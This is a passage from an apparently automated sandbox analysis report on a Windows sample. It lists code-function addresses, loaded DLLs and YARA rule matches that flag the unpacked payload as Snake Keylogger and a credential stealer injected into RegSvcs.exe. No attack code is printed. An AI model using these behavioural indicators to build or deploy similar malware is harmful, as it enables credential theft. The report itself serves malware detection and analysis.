              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7D1687_2_04F7D168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7D1587_2_04F7D158
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F709007_2_04F70900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7B2EF7_2_04F7B2EF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7E2C87_2_04F7E2C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7E2B87_2_04F7E2B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7DA187_2_04F7DA18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F772007_2_04F77200
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7DA097_2_04F7DA09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7BBB07_2_04F7BBB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7BBA07_2_04F7BBA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7EB787_2_04F7EB78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7EB687_2_04F7EB68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F7B3007_2_04F7B300
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060586087_2_06058608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605AA587_2_0605AA58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605D6707_2_0605D670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605B6E87_2_0605B6E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06058B587_2_06058B58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605C3887_2_0605C388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605A4087_2_0605A408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605D0287_2_0605D028
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605B0A07_2_0605B0A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605BD387_2_0605BD38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060511A07_2_060511A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605C9D87_2_0605C9D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060586027_2_06058602
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605560A7_2_0605560A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060556187_2_06055618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605AA487_2_0605AA48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06055A607_2_06055A60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605D6627_2_0605D662
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06055A707_2_06055A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06055EB87_2_06055EB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06055EC87_2_06055EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605B6D87_2_0605B6D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060563127_2_06056312
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060563207_2_06056320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060537307_2_06053730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060567687_2_06056768
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060567787_2_06056778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605C3787_2_0605C378
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060533A87_2_060533A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060533B87_2_060533B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06056BC17_2_06056BC1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06056BD07_2_06056BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605A3FA7_2_0605A3FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060528077_2_06052807
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060500067_2_06050006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060528187_2_06052818
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605D0187_2_0605D018
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060544307_2_06054430
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060500407_2_06050040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060570497_2_06057049
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060570507_2_06057050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060504887_2_06050488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060574977_2_06057497
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605B0907_2_0605B090
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060504987_2_06050498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060574A87_2_060574A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060508E07_2_060508E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060508F07_2_060508F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060578F07_2_060578F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060579007_2_06057900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605BD287_2_0605BD28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06050D397_2_06050D39
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06050D487_2_06050D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06057D487_2_06057D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06057D587_2_06057D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605518A7_2_0605518A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060511917_2_06051191
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060551987_2_06055198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060581A07_2_060581A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_060581B07_2_060581B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0605C9C87_2_0605C9C8
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 9_2_03D437C09_2_03D437C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AFC1F010_2_00AFC1F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AF616810_2_00AF6168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AFC4D310_2_00AFC4D3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AFB50010_2_00AFB500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AFC7B110_2_00AFC7B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AF679010_2_00AF6790
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AF98B810_2_00AF98B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AFCA9110_2_00AFCA91
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AFFA1010_2_00AFFA10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AF4B3110_2_00AF4B31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AFEDF010_2_00AFEDF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AFBF1010_2_00AFBF10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AFE30010_2_00AFE300
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AFE31010_2_00AFE310
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00AF35C810_2_00AF35C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637860810_2_06378608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637D67010_2_0637D670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637AA5810_2_0637AA58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637B6E810_2_0637B6E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637C38810_2_0637C388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637D02810_2_0637D028
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637A40810_2_0637A408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06378C5110_2_06378C51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637B0A010_2_0637B0A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637BD3810_2_0637BD38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_063711A010_2_063711A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637C9D810_2_0637C9D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637561810_2_06375618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637560A10_2_0637560A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06375A7010_2_06375A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637D66310_2_0637D663
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06375A6010_2_06375A60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637AA4810_2_0637AA48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06375EB810_2_06375EB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637B6D810_2_0637B6D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06375EC810_2_06375EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637373010_2_06373730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637632010_2_06376320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637631210_2_06376312
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637677810_2_06376778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637C37810_2_0637C378
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637676A10_2_0637676A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_063733B810_2_063733B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_063733A810_2_063733A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637A3FA10_2_0637A3FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06376BD010_2_06376BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06376BC110_2_06376BC1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637443010_2_06374430
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637281810_2_06372818
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637D01810_2_0637D018
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637280710_2_06372807
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637000610_2_06370006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637705010_2_06377050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637004010_2_06370040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637704010_2_06377040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_063774A810_2_063774A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637749710_2_06377497
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637B09010_2_0637B090
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637049810_2_06370498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637048810_2_06370488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_063708F010_2_063708F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_063778F010_2_063778F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_063708E010_2_063708E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06370D3910_2_06370D39
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637BD2810_2_0637BD28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637790010_2_06377900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06377D5810_2_06377D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06370D4810_2_06370D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06377D4810_2_06377D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_063781B010_2_063781B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_063781A010_2_063781A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637119110_2_06371191
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637519810_2_06375198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637518A10_2_0637518A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_063785FC10_2_063785FC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0637C9C810_2_0637C9C8
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: String function: 0013F9F2 appears 31 times
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: String function: 00140A30 appears 46 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 002DF9F2 appears 31 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 002E0A30 appears 46 times
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
              Source: PsBygexGwH.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
